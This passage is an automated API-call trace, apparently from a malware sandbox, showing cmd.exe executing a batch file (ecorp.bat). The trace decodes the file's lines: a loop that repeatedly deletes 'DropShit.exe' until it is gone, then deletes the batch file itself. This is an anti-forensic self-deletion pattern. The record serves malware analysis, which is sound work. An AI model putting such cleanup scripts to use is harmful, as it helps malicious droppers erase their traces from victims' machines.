_get_osfhandle (_FileHandle=1) returned 0x7 [0092.030] GetFileType (hFile=0x7) returned 0x2 [0092.031] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.031] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14dbc8 | out: lpMode=0x14dbc8) returned 1 [0092.031] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.031] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14dc08, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14dc08*=0x34) returned 1 [0092.031] _get_osfhandle (_FileHandle=2) returned 0xb [0092.031] GetFileType (hFile=0xb) returned 0x2 [0092.031] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0092.031] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14db68 | out: lpMode=0x14db68) returned 1 [0092.032] _get_osfhandle (_FileHandle=2) returned 0xb [0092.032] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14dba0 | out: lpConsoleScreenBufferInfo=0x14dba0) returned 1 [0092.032] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0092.032] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x14dc10 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0092.032] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x14db90, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14db90*=0x13) returned 1 [0092.032] FindNextFileW (in: hFindFile=0x251d50, lpFindFileData=0x26f184 | out: lpFindFileData=0x26f184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7a8400, ftCreationTime.dwHighDateTime=0x1d53bb1, ftLastAccessTime.dwLowDateTime=0xed131a80, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xeb495700, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x9600, dwReserved0=0x0, dwReserved1=0x0, cFileName="DropShit.exe", cAlternateFileName="")) returned 0 [0092.032] GetLastError () returned 0x12 [0092.033] FindClose (in: hFindFile=0x251d50 | out: hFindFile=0x251d50) returned 1 [0092.033] GetProcessHeap () returned 0x250000 [0092.033] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26f170 | out: hHeap=0x250000) returned 1 [0092.033] GetProcessHeap () returned 0x250000 [0092.033] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cdc0 | out: hHeap=0x250000) returned 1 [0092.033] GetProcessHeap () returned 0x250000 [0092.033] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266b20 | out: hHeap=0x250000) returned 1 [0092.033] GetProcessHeap () returned 0x250000 [0092.033] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cd50 | out: hHeap=0x250000) returned 1 [0092.033] GetProcessHeap () returned 0x250000 [0092.033] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ef00 | out: hHeap=0x250000) returned 1 [0092.033] GetProcessHeap () returned 0x250000 [0092.033] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251b30 | out: hHeap=0x250000) returned 1 [0092.033] GetProcessHeap () returned 0x250000 [0092.033] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2518c0 | out: hHeap=0x250000) returned 1 [0092.033] GetProcessHeap () returned 0x250000 [0092.033] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0092.033] GetProcessHeap () returned 0x250000 [0092.033] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268a90 | out: hHeap=0x250000) returned 1 [0092.033] GetProcessHeap () returned 0x250000 [0092.033] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266ae0 | out: hHeap=0x250000) returned 1 [0092.033] GetProcessHeap () returned 0x250000 [0092.033] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268a50 | out: hHeap=0x250000) returned 1 [0092.033] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.033] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.033] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.033] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0092.033] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.034] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0092.034] SetConsoleInputExeNameW () returned 0x1 [0092.034] GetConsoleOutputCP () returned 0x1b5 [0092.034] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0092.034] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0092.034] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0092.034] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0092.034] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.034] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.034] GetProcessHeap () returned 0x250000 [0092.034] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0092.034] GetProcessHeap () returned 0x250000 [0092.034] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268a10 | out: hHeap=0x250000) returned 1 [0092.034] GetProcessHeap () returned 0x250000 [0092.034] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0092.034] GetProcessHeap () returned 0x250000 [0092.034] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0092.034] GetProcessHeap () returned 0x250000 [0092.034] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cf30 | out: hHeap=0x250000) returned 1 [0092.034] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.035] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.035] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x34, lpOverlapped=0x0) returned 1 [0092.035] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.035] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=37, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="if exist \"DropShit.exe\" goto Repeat\r\n") returned 37 [0092.035] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.035] GetFileType (hFile=0x5c) returned 0x1 [0092.035] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.035] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.035] GetProcessHeap () returned 0x250000 [0092.035] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x27c760 [0092.035] GetProcessHeap () returned 0x250000 [0092.035] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27c760 | out: hHeap=0x250000) returned 1 [0092.035] GetProcessHeap () returned 0x250000 [0092.035] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cf30 [0092.035] GetProcessHeap () returned 0x250000 [0092.035] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x16) returned 0x27a2f0 [0092.035] GetProcessHeap () returned 0x250000 [0092.035] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x28) returned 0x2645e0 [0092.035] GetProcessHeap () returned 0x250000 [0092.035] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2645e0, Size=0x1e) returned 0x264610 [0092.035] GetProcessHeap () returned 0x250000 [0092.035] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x264610) returned 0x1e [0092.035] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0092.035] GetProcessHeap () returned 0x250000 [0092.035] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cff0 [0092.035] GetProcessHeap () returned 0x250000 [0092.035] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1c) returned 0x2645e0 [0092.035] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0092.035] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0092.036] GetProcessHeap () returned 0x250000 [0092.036] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x266a60 [0092.036] GetProcessHeap () returned 0x250000 [0092.036] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4c) returned 0x268a10 [0092.036] GetProcessHeap () returned 0x250000 [0092.036] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x268a10, Size=0x30) returned 0x268a10 [0092.036] GetProcessHeap () returned 0x250000 [0092.036] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x268a10) returned 0x30 [0092.036] GetProcessHeap () returned 0x250000 [0092.036] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26d0b0 [0092.036] GetProcessHeap () returned 0x250000 [0092.036] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1a) returned 0x278f90 [0092.036] GetProcessHeap () returned 0x250000 [0092.036] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x20) returned 0x278fc0 [0092.036] _tell (_FileHandle=3) returned 66 [0092.036] _close (_FileHandle=3) returned 0 [0092.036] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0092.036] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.036] GetFileType (hFile=0x7) returned 0x2 [0092.036] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.036] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0092.037] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.037] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0092.037] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.037] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0092.037] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0092.037] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.037] GetFileType (hFile=0x7) returned 0x2 [0092.037] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.037] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0092.038] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.038] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0092.038] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer="if ") returned 3 [0092.038] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.038] GetFileType (hFile=0x7) returned 0x2 [0092.038] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.038] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.038] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.038] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x3) returned 1 [0092.039] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s %s ", _ArgList=0x14efa8 | out: _Buffer="exist \"DropShit.exe\" ") returned 21 [0092.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.039] GetFileType (hFile=0x7) returned 0x2 [0092.039] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.039] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0092.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.039] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x15) returned 1 [0092.039] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.039] GetFileType (hFile=0x7) returned 0x2 [0092.039] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.039] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.040] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.040] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x278fa0*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x278fa0*, lpNumberOfCharsWritten=0x14efa8*=0x4) returned 1 [0092.040] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efa8 | out: _Buffer=" Repeat ") returned 8 [0092.040] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.040] GetFileType (hFile=0x7) returned 0x2 [0092.040] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.040] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0092.040] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.040] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x8) returned 1 [0092.040] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0092.040] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.041] GetFileType (hFile=0x7) returned 0x2 [0092.041] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.041] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.041] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.041] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0092.041] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x208, lpBuffer=0x14eae0, lpFilePart=0x14e880 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14e880*="DropShit.exe") returned 0x32 [0092.041] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0092.041] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x1, lpFindFileData=0x14e890, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e890) returned 0x268a50 [0092.042] FindClose (in: hFindFile=0x268a50 | out: hFindFile=0x268a50) returned 1 [0092.042] GetConsoleTitleW (in: lpConsoleTitle=0x14ec40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.042] GetProcessHeap () returned 0x250000 [0092.042] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266aa0 [0092.042] GetProcessHeap () returned 0x250000 [0092.042] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x266aa0, Size=0x20) returned 0x278ff0 [0092.042] GetProcessHeap () returned 0x250000 [0092.042] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x278ff0) returned 0x20 [0092.042] GetProcessHeap () returned 0x250000 [0092.042] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266aa0 [0092.042] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14e6f8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0092.042] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0092.042] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.042] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.042] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.042] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x51 [0092.042] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.042] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.042] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.042] GetFileType (hFile=0x5c) returned 0x1 [0092.042] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.042] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0xf, lpOverlapped=0x0) returned 1 [0092.042] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=15, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr="del ecorp.bat\r\n") returned 15 [0092.043] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.043] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0092.043] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.043] GetFileType (hFile=0x5c) returned 0x1 [0092.043] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0092.043] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x0, lpOverlapped=0x0) returned 1 [0092.043] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.043] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.043] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.043] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.043] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.043] GetFileType (hFile=0x5c) returned 0x1 [0092.043] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.043] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x51, lpOverlapped=0x0) returned 1 [0092.043] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0092.043] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=9, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr=":Repeat\r\n.bat\r\n") returned 9 [0092.043] _close (_FileHandle=3) returned 0 [0092.043] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.043] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.086] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.086] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0092.086] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.086] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0092.087] SetConsoleInputExeNameW () returned 0x1 [0092.087] GetConsoleOutputCP () returned 0x1b5 [0092.087] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0092.087] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0092.087] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0092.087] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0092.087] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.087] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0092.087] GetProcessHeap () returned 0x250000 [0092.087] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0092.087] GetProcessHeap () returned 0x250000 [0092.087] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278ff0 | out: hHeap=0x250000) returned 1 [0092.087] GetProcessHeap () returned 0x250000 [0092.087] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278fc0 | out: hHeap=0x250000) returned 1 [0092.087] GetProcessHeap () returned 0x250000 [0092.087] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278f90 | out: hHeap=0x250000) returned 1 [0092.087] GetProcessHeap () returned 0x250000 [0092.087] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26d0b0 | out: hHeap=0x250000) returned 1 [0092.087] GetProcessHeap () returned 0x250000 [0092.087] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268a10 | out: hHeap=0x250000) returned 1 [0092.087] GetProcessHeap () returned 0x250000 [0092.087] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0092.087] GetProcessHeap () returned 0x250000 [0092.087] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2645e0 | out: hHeap=0x250000) returned 1 [0092.087] GetProcessHeap () returned 0x250000 [0092.087] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cff0 | out: hHeap=0x250000) returned 1 [0092.087] GetProcessHeap () returned 0x250000 [0092.087] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x264610 | out: hHeap=0x250000) returned 1 [0092.088] GetProcessHeap () returned 0x250000 [0092.088] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0092.088] GetProcessHeap () returned 0x250000 [0092.088] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cf30 | out: hHeap=0x250000) returned 1 [0092.088] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.088] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0092.088] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x48, lpOverlapped=0x0) returned 1 [0092.088] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.088] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=20, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="del \"DropShit.exe\"\r\nxe\" goto Repeat\r\n") returned 20 [0092.088] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.088] GetFileType (hFile=0x5c) returned 0x1 [0092.088] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.088] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.088] GetProcessHeap () returned 0x250000 [0092.088] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x27c760 [0092.088] GetProcessHeap () returned 0x250000 [0092.088] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27c760 | out: hHeap=0x250000) returned 1 [0092.088] GetProcessHeap () returned 0x250000 [0092.088] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cf30 [0092.088] GetProcessHeap () returned 0x250000 [0092.088] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x27a2f0 [0092.088] GetProcessHeap () returned 0x250000 [0092.088] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266a60 [0092.088] _tell (_FileHandle=3) returned 29 [0092.088] _close (_FileHandle=3) returned 0 [0092.089] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0092.089] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.089] GetFileType (hFile=0x7) returned 0x2 [0092.089] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 